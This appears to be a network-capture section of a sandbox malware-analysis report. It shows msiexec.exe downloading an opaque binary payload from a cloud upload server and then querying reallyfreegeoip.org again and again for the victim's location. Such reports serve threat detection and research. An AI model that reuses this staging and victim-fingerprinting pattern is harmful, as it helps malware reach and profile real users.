2024-12-19 09:29:59 UTC	4955	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFiumC5cpMnjBhdCHV5lRQ7SQ-VTsaJeRZT9SE7JAzxpuvtAtVXUBiHHOQa9OF_4JCTqO1NZKdnxzGo Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="EQdTwOUCnaqfnktrHcZkeVhGr96.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 277056 Last-Modified: Wed, 18 Dec 2024 10:25:16 GMT Date: Thu, 19 Dec 2024 09:29:58 GMT Expires: Thu, 19 Dec 2024 09:29:58 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=JSoNfw== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-19 09:29:59 UTC	4955	IN	Data Raw: 2a 81 af 38 73 06 b2 6f 98 b9 6c d1 67 79 08 26 53 a6 46 f4 2d 5a b8 96 32 fb a0 2f 2a 4e 52 64 e0 1f 70 25 03 39 ce 24 14 2f 5b 63 29 bc 56 9a 7e a2 0c 9f 0a 5d d4 5a 21 45 ba 72 c0 4c 18 73 da 8a 92 d2 f0 02 56 17 77 f0 91 c5 6d 08 b3 17 db 20 50 d0 56 5d 97 c0 e6 34 d0 09 f7 be cb ed 1a 22 e0 24 1f fa ab ef 07 88 c6 e9 8d 5a 2d ff d0 3c f0 b1 be 7f d6 c2 c6 e0 7d f1 b3 a9 ee 3e c0 d2 d0 d4 db 4c 3d c8 b5 4d 3d 62 9b ba 31 10 3c de 96 5f 26 81 fb ff af b7 03 6c 04 63 6c 52 d2 4f 9c 29 0f 8a ae ff ac 69 b0 c5 b9 8a fa b6 3c 75 ab 9e f9 04 e0 56 73 9e cc 18 b5 ce 21 94 8a e7 85 74 6f 92 76 93 18 d6 89 22 68 04 10 b0 bc 89 96 87 4a da f2 f8 96 ca 7c f5 ec 66 b9 0e fb 11 25 eb 86 17 80 82 9c be 69 4d f7 05 02 53 fc 90 c7 a7 f1 52 2e f1 4d 16 9c d7 27 46 8b Data Ascii: 8solgy&SF-Z2/NRdp%9$/[c)V~]Z!ErLsVwm PV]4"$Z-<}>L=M=b1<_&lclRO)i<uVs!tov"hJ\|f%iMSR.M'F
2024-12-19 09:29:59 UTC	4787	IN	Data Raw: 5b b0 cc 05 95 21 e5 bd a4 da 25 78 c3 e1 c1 1d 24 42 d1 39 87 fe cf 0e b6 67 f8 f1 cb 1b 93 47 fa 12 7a 4e e1 97 7b af 34 a5 f9 b5 53 7c 05 21 7d 2c 75 47 03 4f 5d 0e 32 ae 77 53 96 0d 1b 6c a1 c9 72 0d f4 cb 97 67 a3 33 5a f8 69 a1 0b cd 8d f8 3c ff 92 a6 bf 06 46 39 60 3a ca 98 f5 36 19 9c ff 8a e8 a1 cb f8 40 ca 6e 11 ce e6 a4 4b f5 8c 8b a3 f1 c3 28 bb aa ad 22 6d 76 a4 09 31 a2 a4 f1 f6 45 8f f7 3b 44 38 94 c5 b3 47 2c f8 78 21 8b 13 b5 4d 88 09 46 7d 16 3d 2f 91 e1 3f d8 49 d5 cd d1 e6 19 a3 0c 6d f3 c4 88 34 8e f2 75 8e ca d5 e7 cd 91 47 ba 86 bb c2 f7 26 25 99 0f ea 26 35 a0 8b 05 f3 14 a0 55 88 6d 9b 0a 65 52 68 1e b5 33 34 9f 69 3d ea 37 ca a2 74 bc e7 fb bf 4c 8e 7b 12 84 95 6f e9 46 26 2f 11 8d c2 c2 0e f8 3e 8e 64 49 35 07 d4 5b 9d ac b2 6b Data Ascii: [!%x$B9gGzN{4S\|!},uGO]2wSlrg3Zi<F9`:6@nK("mv1E;D8G,x!MF}=/?Im4uG&%&5UmeRh34i=7tL{oF&/>dI5[k
2024-12-19 09:29:59 UTC	1324	IN	Data Raw: 83 3d 83 94 35 a0 cd 5b a7 9a 4d e2 a0 6e e6 80 93 93 19 3e a4 04 6b b4 e8 95 3c 24 68 92 8c fd e2 38 d1 90 8e ad 02 19 d4 fb 5a 81 fe 46 c5 c8 97 b2 b1 5a 95 25 0d 8f 72 2b cc 37 13 2f ab 4b a7 7b f7 0e 8d c4 4e 8b a6 74 a8 89 f0 b3 21 14 10 80 82 31 87 d6 ed 5e b0 9c 82 d0 2e 9d e2 47 8f 8d 52 0c 47 5c ec 00 a0 1c 8c 39 7f 02 e4 ce 6b 46 4a b2 6f c9 d9 cf 98 13 aa 0a e5 44 e8 e0 f6 d0 13 29 a4 83 d8 12 72 59 83 2d f6 00 87 23 e2 8c 85 41 6b 3f cc fc e1 80 98 6d 0b 4e 9c ae dd 5f 62 ad 66 f6 cf 23 b6 47 38 c3 ba 19 66 4e 01 35 f5 2a ce 00 b5 15 cf 31 a9 9b 95 14 5f 88 cb 66 67 a2 61 46 62 05 a3 c5 f0 4d 60 51 04 4d c7 dd 3d b8 78 e2 54 58 79 dd 1b b8 99 34 14 ff d9 73 11 03 08 e6 c7 78 fb 6a 87 b8 9a b8 7b f8 93 36 11 08 76 e4 f6 1b 1b ba 9d 52 08 9e eb Data Ascii: =5[Mn>k<$h8ZFZ%r+7/K{Nt!1^.GRG\9kFJoD)rY-#Ak?mN_bf#G8fN5*1_fgaFbM`QM=xTXy4sxj{6vR
2024-12-19 09:29:59 UTC	1390	IN	Data Raw: 24 30 fe f1 13 db 89 75 06 78 d7 a2 55 b2 ad f5 39 4f 5b 3d a7 23 56 64 66 10 90 f7 5a 93 e2 96 0e 85 7e cd a5 32 59 0f 3e a3 38 ac c9 d1 84 6c 8b 7b 60 64 e1 1b 30 60 84 f2 c5 47 dd 79 52 1f c3 82 50 06 05 50 ef bc dc d4 d6 e4 3b db b4 d6 04 73 ad 6b 37 f2 9c 84 73 46 5e 29 54 f1 70 38 86 fc 4b 18 a0 81 6d 35 79 0e 99 00 e7 a6 2a d7 d6 d6 97 06 43 57 c2 83 90 8f 2f b4 15 41 e7 36 98 38 3b 3b 2f 73 67 c6 2b e0 9c d7 82 62 dc 10 bd 6a ec 31 1e 31 92 2b 1e 52 d5 7b cd 53 52 2d 75 b3 57 41 f4 07 e3 6b c7 73 68 a2 81 7f d6 ac 0b ba 82 16 14 99 fe 09 75 1b d1 1d ba e1 ba df ad 57 b8 00 53 fc 43 99 f9 be 27 93 d3 4c 1d 39 01 d8 1d a7 fa 8d 6e 43 96 db 00 0c df 25 66 2d 9f 29 0b 66 e4 42 93 12 a1 00 28 d6 dd e1 3d 30 c9 7d a5 07 ca 1e c3 aa 5f 3e d6 4c 48 31 07 Data Ascii: $0uxU9O[=#VdfZ~2Y>8l{`d0`GyRPP;sk7sF^)Tp8Km5y*CW/A68;;/sg+bj11+R{SR-uWAkshuWSC'L9nC%f-)fB(=0}_>LH1
2024-12-19 09:29:59 UTC	1390	IN	Data Raw: 81 b1 16 67 ea f1 16 48 da 88 ad 9f a1 9e b5 ba 97 07 ba c6 2e 16 26 af 56 05 81 00 a0 26 46 fb 69 64 63 83 75 43 40 2e 87 cd 0f fa 78 e4 bd ae d4 5b 53 c3 e1 c5 6e c9 40 d1 33 94 54 df 08 d9 ad f8 f1 c1 c2 95 28 29 1c 7a 44 e1 e9 47 af 34 a1 8a 7c 53 7d 0f 32 75 85 45 47 03 93 2e 9b 30 be 07 45 be c9 1b 6c aa c4 bc 0f e7 73 86 6e 8f 2c 4b f0 6f ce c1 e5 ee f2 3c f5 b2 aa 97 4d 4e 2f 05 f3 a5 c4 ff 36 13 e2 93 f4 d6 ab cb fb 77 11 e3 4e c4 89 69 24 90 86 8b b8 f9 ba 15 d4 cc a9 5c 5c 71 cb 6a 42 1e ae 9e 94 2a 42 fd 37 4e 4b ec cd a2 4b 50 32 78 30 85 1b b3 38 8d c6 46 77 0f 38 07 e4 e4 4c b5 49 0b d7 e7 c8 3c a5 0e 08 8c ce 88 16 ec 2c 7b 84 05 d3 cb c5 80 3f e0 87 bb c6 8f b3 fb 88 7b 93 63 b4 a0 81 02 3b e4 a1 57 86 50 98 22 ab 3c 69 1e cb 12 34 43 b3 Data Ascii: gH.&V&FidcuC@.x[Sn@3T()zDG4\|S}2uEG.0Elsn,Ko<MN/6wNi$\\qjB*B7NKKP2x08Fw8LI<,{?{c;WP"<i4C
2024-12-19 09:29:59 UTC	1390	IN	Data Raw: a2 c2 52 3d ca e1 71 d0 a0 de d5 af 42 d1 2c 62 16 37 34 43 23 93 5c 6e fa 44 6d e2 b7 de 38 76 f0 2d 23 74 4d a4 f8 a2 9d 83 bd b2 c8 83 2c e2 d8 c4 3a 3e d4 1d 3c 6c 59 2c 39 2b 70 a5 2d 52 7e 0b 1c 09 68 4a a6 f7 31 c2 8c 10 f9 2c f1 44 09 91 06 b5 95 98 94 b5 1e d3 02 50 bf e3 c4 ed 1c 70 f9 45 d5 bf 64 6e fd 52 ba 06 fc 87 29 46 e0 85 e7 b9 e7 5b 20 1d 3b e2 4f 2e 1e 96 64 d4 9e 4c 72 84 ee 7b 09 2b 40 60 dc e0 ca 95 90 1c c0 1d 6f 2c d9 b4 da 59 a7 a5 9f 79 0e 2b 5f 00 e6 33 6b 8f d7 22 51 23 ca 80 7a 1a 9d 1d df 72 4c 54 03 eb 5c 7a f8 dd 6e 6f 89 27 08 15 7f 56 25 d2 b2 a1 b2 39 01 7e 68 c8 c2 d5 48 6c 37 25 7a 79 96 c2 b4 bf 55 c5 e7 72 8e 7c 3c 98 44 57 f5 1e 9d e5 6f cf 5d 2f a2 d7 78 a0 4f e5 b6 98 08 d2 f7 fe c1 01 2e 90 74 34 0e 61 22 ee d5 Data Ascii: R=qB,b74C#\nDm8v-#tM,:><lY,9+p-R~hJ1,DPpEdnR)F[ ;O.dLr{+@`o,Yy+_3k"Q#zrLT\zno'V%9~hHl7%zyUr\|<DWo]/xO.t4a"
2024-12-19 09:29:59 UTC	1390	IN	Data Raw: 65 07 11 26 b7 74 91 35 2f f8 d1 82 96 11 c4 96 54 c5 a9 9c 42 06 de e7 b8 72 ed 5c 5d 8d d1 09 a9 a1 8a 94 da a8 85 65 39 fc df 93 c1 59 19 55 73 6b cb b0 bc 83 96 87 92 19 f0 f9 9d cb 2c e3 c4 34 bd 0e f1 05 05 eb 8a 17 80 aa d5 fd 6d 47 f7 39 8f 13 fc f0 c2 82 e7 20 c8 fa 4d 46 b4 96 27 44 8d f7 b4 2a 5e e6 cc 1c cd 02 3c 2e d2 27 b1 ff 69 83 d9 e6 a0 0d c8 4b 40 40 0d 46 ca b8 43 a5 19 cd 28 12 1d 85 4c be 90 6b 18 5c 60 14 32 b3 d6 ad 62 c6 4d f1 18 7c d7 d0 e8 7f 15 9c 53 0c 25 f1 0f 20 7e b3 f9 93 87 49 5e b1 6a 83 23 b6 89 61 4d 6a da 08 33 e8 d4 3c 24 68 23 a1 88 ca 5a db 83 9a 02 85 0a d4 8b 24 9e fe 38 f3 e0 de b6 c3 c5 e5 e2 6f 99 2a 82 8e 37 19 3f 44 54 a5 69 ce 4c b4 07 4a 8b 7b 8b 86 89 f0 92 7b 53 00 80 f8 34 b0 57 c5 3c ba 8a 76 0f 3d 9a Data Ascii: e&t5/TBr\]e9YUsk,4mG9 MF'D^<.'iK@@FC(Lk\`2bM\|S% ~I^j#aMj3<$h#Z$8o7?DTiLJ{{S4W<v=
2024-12-19 09:29:59 UTC	1390	IN	Data Raw: c2 b1 f8 27 ca ca 86 8d 38 37 e8 3e 5c 2d 47 2d d7 56 b0 69 f5 42 2e 87 96 af 3a 82 97 3b 3c ec 9b ce fa 3c f3 29 aa 8d 58 d8 95 6e d1 32 87 4b 8c 81 4a 51 28 aa 37 5f 9d 45 c2 15 08 ac 98 10 64 06 0d 77 4a 0f d1 7c 58 dc cb 34 02 49 69 5e 39 4e d2 93 9e 93 77 6d 30 33 15 28 81 d0 9b 09 30 8e e3 49 29 99 75 7c 78 01 22 46 92 b6 c3 fe 80 48 3b b6 0d 35 54 67 1a 8d 7a 0e 6d e4 aa 2b 93 0a f3 6a 32 29 a7 33 75 10 18 c3 d1 fd 0c ae 63 18 10 e9 0a 47 bc 9b eb bb 7b ae ba 56 bd ec f7 e6 8d 0a 5a 9f 0f fe a0 6d ce 3b d1 ce 49 21 6f db 9d fe f2 ec 2c 5b 22 59 5b c7 8e 2c 48 ae 42 58 39 b1 7e 82 25 79 7f 94 4d 95 55 32 b8 61 74 b2 1b 6b f2 c5 9e 17 6d 0a ac 66 03 fe 44 d3 8c 1e 52 f3 6e 70 ee 9b 42 b9 c7 52 76 c7 62 aa c7 c4 34 bc 14 81 46 04 44 fd 09 6f 76 42 5f Data Ascii: '87>\-G-ViB.:;<<)Xn2KJQ(7_EdwJ\|X4Ii^9Nwm03(0I)u\|x"FH;5Tgzm+j2)3ucG{VZm;I!o,["Y[,HBX9~%yMU2atkmfDRnpBRvb4FDovB_
2024-12-19 09:29:59 UTC	1390	IN	Data Raw: a5 ab 7c cc 3b ba 3f 4e c5 f7 06 cb 99 a7 11 ef 54 59 aa d4 de 52 13 80 1d d2 c1 70 df da 16 6e 0b bb cf 2c a4 fe f4 34 c2 55 ba 98 0f 99 fd 2b 02 3b 4a 3d 1f b9 91 a7 64 58 08 25 1f 53 ca 2a 77 bd 38 b6 2a aa 15 8b 96 e7 12 3f e9 76 3d 73 69 80 c9 2c 85 67 b8 d8 5b 27 1e f9 d9 56 ad cb 50 05 63 38 76 29 2d c3 3f ad ef 09 14 e5 a2 e5 6a a6 e5 48 9c 75 b6 28 37 81 20 a4 88 63 e1 33 ee 73 83 0f e1 68 25 b8 cd 05 91 a1 c6 cf dd c3 25 08 bd fe c1 1d 20 68 98 39 87 59 df 2d c8 3c f8 f1 cf fb ac 47 fa 1a 7a 90 f1 b2 53 9b 34 a5 f3 a6 77 7d 2d 43 7d fb 7e 99 03 97 5c 0e 4c 89 77 53 92 3a 8e 6e a0 a2 54 26 75 7a 97 6d b5 de 5b eb 5d b0 2e c9 b2 e5 b1 b5 99 a1 96 79 50 4b 51 2f a5 b4 57 13 04 db 2f 8a e8 a1 69 da 47 a8 84 41 ce 96 07 01 89 f2 b3 a9 f1 c0 8d f1 d6 Data Ascii: \|;?NTYRpn,4U+;J=dX%Sw8?v=si,g['VPc8v)-?jHu(7 c3sh%% h9Y-<GzS4w}-C}~\LwS:nT&uzm[].yPKQ/W/iGA
2024-12-19 09:29:59 UTC	1390	IN	Data Raw: dd f6 74 3b 08 72 93 9d 3e 07 c2 17 4c 76 df 49 c5 9b 86 52 fe 8a c1 b6 43 e8 74 7c cc cf 71 e3 d0 8a 04 a1 90 9b 4d 55 6e 67 70 ca 06 4c d6 15 03 9e 46 e8 7a cb 97 32 90 46 77 79 d5 98 df 55 e6 6b 6b ef 9c 88 76 ac 83 f5 95 82 82 8c 28 91 b2 10 da 2e b6 b0 80 8f 5d 92 ab d5 46 93 9d a2 aa f0 61 ca eb 7b cd b9 c5 f2 c0 8a fb 37 58 1f 26 fc 2b ec 93 7c 64 fa 8b 7d b9 83 ea 38 72 95 d0 30 74 6f b4 a2 a3 97 2d ab 9a 49 83 2c e8 b0 0f 39 34 d6 56 0b 69 59 5c 51 30 f1 a5 29 2a fd f7 1d 6a 6a 73 33 ce ca c9 9a ee e5 aa b6 7d 2d 91 23 a3 f3 73 d7 b5 6e 70 0f 6a 97 57 ce 9f 3d c2 dc 2d b0 55 68 6e 8d f1 ba 09 fc fb 29 46 e0 0f c6 a3 95 6c 4c a4 4b 40 60 47 47 a3 64 a4 b2 b5 57 98 96 42 54 2b 30 c6 dc df ca 95 90 71 ca 63 59 28 f1 fa a8 68 bc 07 fb 7b 32 82 e5 00 Data Ascii: t;r>LvIRCt\|qMUngpLFz2FwyUkkv(.]Fa{7X&+\|d}8r0to-I,94ViY\Q0)*jjs3}-#snpjW=-Uhn)FlLK@`GGdWBT+0qcY(h{2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49713	104.21.67.152	443	1912	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:30:14 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-19 09:30:14 UTC	876	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:30:14 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 589383 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k%2BG9Sn5MRxjsTSdykEVKYpjcIjWg2EEqBZz9O7V%2Fej1Ywwo3g3c%2F3Hn2wbd6fypTlppuVJ6uF7AaPedlcrp1HIOtc37DBMGa94X8Sm2BOPT33uheJpIkxQa95AYqqUXxeoHWgTBd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f465f710d788c24-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1992&min_rtt=1984&rtt_var=761&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1421616&cwnd=141&unsent_bytes=0&cid=16dd83994ed973b2&ts=451&x=0"
2024-12-19 09:30:14 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49714	104.21.67.152	443	1912	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:30:19 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-19 09:30:19 UTC	885	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:30:19 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 589388 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zSvdfWu%2B9bhrG9GnhPqToM7njxu%2FbtjEPm1%2BNvYeYi%2Bt%2FCFW1mejzMQMT0Hmn9F1jmzEA9grIqBnnqdgb7ahwmKczmZ%2Fz5dpPSuKMXfe9EMU0DTGFtL4l1%2BKPcskA8adQOEnsqFf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f465f904c618c7d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2367&min_rtt=2024&rtt_var=1004&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1442687&cwnd=237&unsent_bytes=0&cid=c3a515efebfdb7e1&ts=452&x=0"
2024-12-19 09:30:19 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49716	104.21.67.152	443	1912	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:30:23 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-19 09:30:23 UTC	884	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:30:23 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 589392 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BqWwNQ403nyDCxsQojxIuqKlCkO%2FFjjeZPKcH%2F%2F8zwEJnEoOUd8l3tLhAdGh%2BJiqQm4xSUxgX7Z%2BDhDlOOoxD5FaZh3xH33MG%2FwS7xDXPQnEdE1rQPVYgabHgEPzzE7ttj9DYZRd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f465faa4b83c33d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1464&min_rtt=1459&rtt_var=558&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1941489&cwnd=138&unsent_bytes=0&cid=0057e570c6cb503a&ts=483&x=0"
2024-12-19 09:30:23 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49718	104.21.67.152	443	1912	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:30:26 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-19 09:30:26 UTC	874	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:30:26 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 589395 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RxO3I54IVw%2BraRhYJMKd2cAZ9LwsCFr9P%2B0Ay4iPbZaCabKcpQ0bZ6JkAdMcITRsgSJVX7ZcCG7cJaktGP1XKO1aFDZEaNpQgO5Yrs1Fdb8NpP8jXhBRchZzsyfks4VPEKuen74i"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f465fbd6c607cfc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1797&min_rtt=1792&rtt_var=682&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1591280&cwnd=223&unsent_bytes=0&cid=cf8ead1bc314f875&ts=452&x=0"
2024-12-19 09:30:26 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49720	104.21.67.152	443	1912	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:30:29 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
